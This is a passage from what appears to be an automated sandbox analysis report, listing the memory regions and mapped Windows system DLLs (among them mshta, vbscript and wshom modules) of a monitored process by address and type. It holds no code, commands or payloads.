id = 750
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 751
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 752
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 753
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 754
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 755
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 756
start_va = 0x630000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 757
start_va = 0x4d0000
end_va = 0x5cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 760
start_va = 0x7fee0880000
end_va = 0x7fee1117fff
entry_point = 0x7fee0880000
region_type = mapped_file
name = "mshtml.dll"
filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")
Region:
id = 762
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 763
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 764
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 765
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 766
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 767
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 768
start_va = 0x7fefe3d0000
end_va = 0x7fefe547fff
entry_point = 0x7fefe3d10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 769
start_va = 0x7feff5e0000
end_va = 0x7feff709fff
entry_point = 0x7feff5e10d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 770
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 771
start_va = 0x7fefdf60000
end_va = 0x7fefe1b8fff
entry_point = 0x7fefdf61340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 772
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 773
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 774
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 775
start_va = 0x7fef6080000
end_va = 0x7fef60bafff
entry_point = 0x7fef6080000
region_type = mapped_file
name = "msls31.dll"
filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll")
Region:
id = 776
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 777
start_va = 0x1c0000
end_va = 0x1e8fff
entry_point = 0x1c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 778
start_va = 0x640000
end_va = 0x7c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 779
start_va = 0x1c0000
end_va = 0x1e8fff
entry_point = 0x1c1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 780
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 781
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 782
start_va = 0x7d0000
end_va = 0x950fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 783
start_va = 0x960000
end_va = 0x1d5ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000960000"
filename = ""
Region:
id = 804
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 805
start_va = 0x1c0000
end_va = 0x1c1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 806
start_va = 0x1d0000
end_va = 0x1d0fff
entry_point = 0x1d0000
region_type = mapped_file
name = "mshta.exe.mui"
filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui")
Region:
id = 822
start_va = 0x1e0000
end_va = 0x1e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 823
start_va = 0x1f0000
end_va = 0x1f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 835
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 836
start_va = 0x200000
end_va = 0x200fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 843
start_va = 0x1e60000
end_va = 0x1f5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 844
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 845
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 850
start_va = 0x240000
end_va = 0x2bcfff
entry_point = 0x24cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 851
start_va = 0x240000
end_va = 0x2bcfff
entry_point = 0x24cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 852
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb56bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 853
start_va = 0x1f60000
end_va = 0x20bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 856
start_va = 0x1d60000
end_va = 0x1e3efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d60000"
filename = ""
Region:
id = 857
start_va = 0x7fefb180000
end_va = 0x7fefb197fff
entry_point = 0x7fefb181130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 858
start_va = 0x20c0000
end_va = 0x238efff
entry_point = 0x20c0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 859
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc741010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 860
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 861
start_va = 0x2390000
end_va = 0x26d2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002390000"
filename = ""
Region:
id = 862
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 873
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 874
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 875
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 876
start_va = 0x240000
end_va = 0x24bfff
entry_point = 0x240000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 877
start_va = 0x250000
end_va = 0x257fff
entry_point = 0x250000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 878
start_va = 0x260000
end_va = 0x26ffff
entry_point = 0x260000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 879
start_va = 0x270000
end_va = 0x2affff
entry_point = 0x270000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")
Region:
id = 883
start_va = 0x2b0000
end_va = 0x2b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002b0000"
filename = ""
Region:
id = 884
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 885
start_va = 0x2c0000
end_va = 0x2c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002c0000"
filename = ""
Region:
id = 891
start_va = 0x5d0000
end_va = 0x5d0fff
entry_point = 0x5d0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 892
start_va = 0x5e0000
end_va = 0x5e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 893
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc1ec924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 894
start_va = 0x5d0000
end_va = 0x5d0fff
entry_point = 0x5d0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 895
start_va = 0x5f0000
end_va = 0x5f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 897
start_va = 0x5d0000
end_va = 0x5d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 912
start_va = 0x600000
end_va = 0x601fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 913
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 914
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 915
start_va = 0x1f60000
end_va = 0x1ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 916
start_va = 0x2040000
end_va = 0x20bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002040000"
filename = ""
Region:
id = 917
start_va = 0x7fefce60000
end_va = 0x7fefcebafff
entry_point = 0x7fefce66940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 918
start_va = 0x26e0000
end_va = 0x286ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 919
start_va = 0x7fefbde0000
end_va = 0x7fefbe06fff
entry_point = 0x7fefbde98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 920
start_va = 0x7fefbdd0000
end_va = 0x7fefbddafff
entry_point = 0x7fefbdd1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 934
start_va = 0x29b0000
end_va = 0x2aaffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029b0000"
filename = ""
Region:
id = 935
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 936
start_va = 0x7fef3180000
end_va = 0x7fef31e1fff
entry_point = 0x7fef3181198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 937
start_va = 0x7fef3160000
end_va = 0x7fef317bfff
entry_point = 0x7fef31611a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 938
start_va = 0x7fefadc0000
end_va = 0x7fefadd0fff
entry_point = 0x7fefadc14c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 939
start_va = 0x610000
end_va = 0x610fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 940
start_va = 0x610000
end_va = 0x610fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 941
start_va = 0x7fef6630000
end_va = 0x7fef6638fff
entry_point = 0x7fef66314b4
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 942
start_va = 0x7fefbf70000
end_va = 0x7fefbf84fff
entry_point = 0x7fefbf760d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 943
start_va = 0x2000000
end_va = 0x202ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 944
start_va = 0x2ab0000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ab0000"
filename = ""
Region:
id = 945
start_va = 0x26e0000
end_va = 0x274ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 946
start_va = 0x27f0000
end_va = 0x286ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 947
start_va = 0x28b0000
end_va = 0x29affff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 948
start_va = 0x2c60000
end_va = 0x2d5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 949
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 950
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 951
start_va = 0x7fef46d0000
end_va = 0x7fef46d7fff
entry_point = 0x7fef46d1414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 952
start_va = 0x2af0000
end_va = 0x2beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002af0000"
filename = ""
Region:
id = 953
start_va = 0x2c50000
end_va = 0x2c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c50000"
filename = ""
Region:
id = 954
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 955
start_va = 0x26e0000
end_va = 0x271ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026e0000"
filename = ""
Region:
id = 961
start_va = 0x7fefafc0000
end_va = 0x7fefafd4fff
entry_point = 0x7fefafc12a0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 962
start_va = 0x7fefafa0000
end_va = 0x7fefafb8fff
entry_point = 0x7fefafa177c
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 963
start_va = 0x7fefcfe0000
end_va = 0x7fefd034fff
entry_point = 0x7fefcfe1054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 964
start_va = 0x7fefaf90000
end_va = 0x7fefaf9afff
entry_point = 0x7fefaf912e0
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 965
start_va = 0x7fefc9e0000
end_va = 0x7fefc9e6fff
entry_point = 0x7fefc9e14b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 966
start_va = 0x7fefcfd0000
end_va = 0x7fefcfd6fff
entry_point = 0x7fefcfd142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 967
start_va = 0x7fefbc80000
end_va = 0x7fefbcd2fff
entry_point = 0x7fefbc82b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 968
start_va = 0x2ee0000
end_va = 0x2f5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ee0000"
filename = ""
Region:
id = 969
start_va = 0x7fef6660000
end_va = 0x7fef66d3fff
entry_point = 0x7fef66666f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 970
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 971
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 972
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd7310e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1120
start_va = 0x3050000
end_va = 0x314ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003050000"
filename = ""
Region:
id = 1121
start_va = 0x7fef3c70000
end_va = 0x7fef3c7bfff
entry_point = 0x7fef3c7602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1122
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 1123
start_va = 0x31a0000
end_va = 0x329ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031a0000"
filename = ""
Region:
id = 1124
start_va = 0x779c0000
end_va = 0x779c2fff
entry_point = 0x779c0000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll")
Region:
id = 1125
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 1126
start_va = 0x7fefbc30000
end_va = 0x7fefbc47fff
entry_point = 0x7fefbc31bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1127
start_va = 0x7fefbc50000
end_va = 0x7fefbc60fff
entry_point = 0x7fefbc516ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1131
start_va = 0x32d0000
end_va = 0x33cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032d0000"
filename = ""
Region:
id = 1132
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 1140
start_va = 0x2d80000
end_va = 0x2e7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002d80000"
filename = ""
Region:
id = 1141
start_va = 0x7fef3140000
end_va = 0x7fef314dfff
entry_point = 0x7fef3141070
region_type = mapped_file
name = "msimtf.dll"
filename = "\\Windows\\System32\\msimtf.dll" (normalized: "c:\\windows\\system32\\msimtf.dll")
Region:
id = 1142
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1143
start_va = 0x33d0000
end_va = 0x34cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000033d0000"
filename = ""
Region:
id = 1144
start_va = 0x7fef22f0000
end_va = 0x7fef2343fff
entry_point = 0x7fef22f104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 1145
start_va = 0x620000
end_va = 0x620fff
entry_point = 0x620000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 1149
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
entry_point = 0x7fefd651440
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1150
start_va = 0x1e40000
end_va = 0x1e40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e40000"
filename = ""
Region:
id = 1151
start_va = 0x1e40000
end_va = 0x1e40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e40000"
filename = ""
Region:
id = 1152
start_va = 0x1e40000
end_va = 0x1e40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e40000"
filename = ""
Region:
id = 1157
start_va = 0x7fef2350000
end_va = 0x7fef2f06fff
entry_point = 0x7fef2350000
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 1160
start_va = 0x1e40000
end_va = 0x1e41fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e40000"
filename = ""
Region:
id = 1168
start_va = 0x1f60000
end_va = 0x1f70fff
entry_point = 0x1f60000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 1169
start_va = 0x1f80000
end_va = 0x1ffffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f80000"
filename = ""
Region:
id = 1170
start_va = 0x34d0000
end_va = 0x38c2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000034d0000"
filename = ""
Region:
id = 1171
start_va = 0x38f0000
end_va = 0x39effff
entry_point = 0x0
region_type = private
name = "private_0x00000000038f0000"
filename = ""
Region:
id = 1172
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 1177
start_va = 0x7fee0420000
end_va = 0x7fee04b9fff
entry_point = 0x7fee0420000
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll")
Region:
id = 1222
start_va = 0x7fee52a0000
end_va = 0x7fee52c7fff
entry_point = 0x7fee52a0000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx")
Region:
id = 1223
start_va = 0x7fef9730000
end_va = 0x7fef9747fff
entry_point = 0x7fef9730000
region_type = mapped_file
name = "mpr.dll"
